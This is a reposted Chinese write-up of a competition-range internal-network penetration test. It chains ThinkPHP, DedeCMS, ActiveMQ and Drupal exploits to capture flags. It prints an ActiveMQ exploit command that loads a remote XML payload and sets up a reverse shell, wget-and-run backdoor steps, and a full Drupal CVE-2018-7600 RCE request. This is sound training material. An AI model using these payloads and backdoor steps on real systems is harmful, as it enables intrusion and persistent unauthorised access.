简介
此次渗透测试记录完全为比赛环境
入口点
http://172.16.200.40/
很正常的一个thinkphp的入口,直接利用历史工具进行扫描
那很简单了,直接进行getshell以后,蚁剑连接
通过vshell生成后门,然后进行管理
在根目录下拿到flag
flag4{08396b12-ca29-453a-9e40-ae15c95eff23}第二层
然后查看网卡信息
发现网卡信息
172.16.200.40/24随即利用fscan进行扫描,
注意到这个cms的信息
现在直接利用vshell进行隧道代理,然后去访问这个地址
http://172.16.200.60
然后我们利用bp的sock代理进行访问,也方便后续渗透抓包
直接打开bp内置的浏览器,访问上述cms的地址
常见的dedecms,直接尝试打一波默认弱口令
admin/admin
成功登录
这里直接上传木马即可,然后我们蚁剑走代理,直接访问其上传的木马
然后连接上传的木马
成功连接以后,对其进行上传vshell后门进行管理,这里注意,由于在内网环境,我们是直接访问不了cms这个服务器的,需要走代理,那这里只能进行一个正向木马的连接
然后添加即可
成功添加
根目录下获得flag
flag6{3cf567f4-fc85-4ffa-b64f-72b609072e10}第三层
现在就是正常的渗透,对网卡进行收集,以及对其进行扫描
发现第二张网卡的信息
10.10.10.60/24老样子,对其进行扫描
发现其10.10.10.70上面的一个端口存在activemq的默认密码,这种其实已经可想到activemq的cve漏洞
先对其控制的172.16.200.60上弄一个隧道代理,然后用bp去访问这个服务
然后配置bp,去访问
默认密码
admin/admin
然后搜索此服务的cve漏洞
直接利用即可
先把kali的代理配置好
然后在已经控制的靶机的服务器上搭建一个http服务,利用python
然后再利用poc
proxychains java -jar activemq-exp.jar 10.10.10.70 61616 xml http://10.10.10.60/poc.xml
记得在10.10.10.60上监听4444端口
然后执行poc
成功反弹,在根目录下获得flag
flag7{5b458b1b-6668-42f7-9307-657941f3a0b0}第四层
现在要利用反弹的shell进行一个vshell的上线,现在就是先生成正向的木马,进行上传到刚才10.10.10.60的靶机上
然后再反弹的shell中进行wget,并执行文件
执行以后现在就是,去正向连接
成功上线,老样子,进行网卡收集以及扫描
当然两张网卡都会扫
172.16.100.70/2410.10.10.70/24直接开扫
注意到
http://172.16.100.30 poc-yaml-drupal-cve-2018-7600-rce drupal8对activemq此服务器进行一个隧道代理
然后,直接bp配置好后进行访问
在对cve进行搜索
此处借用freebuf上的poc
https://www.freebuf.com/vuls/268189.html
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1Host: xxxxContent-Type: application/x-www-form-urlencodedContent-Length: 103form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id
成功执行,直接看根目录
flag3{023d904d-e16b-42ac-a52b-63b88fac702b}现在还没完
发现一个新的站点
http://172.16.100.50 code:200 len:18590 title:影视大全 - 最新电视剧,最新电影直接访问
这里利用无影进行一个指纹识别
发现是seacms,这里因为靶场原因,登录不了后台,但其实内容为
seacms_CNVD-2020-22721_v10.1
大家自行尝试
内容转自先知社区,原作者1099509721598427
原文链接:https://xz.aliyun.com/news/18317
文末阅读福利
原文始发于微信公众号(马哥网络安全):某公司比赛内网渗透测试记录
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论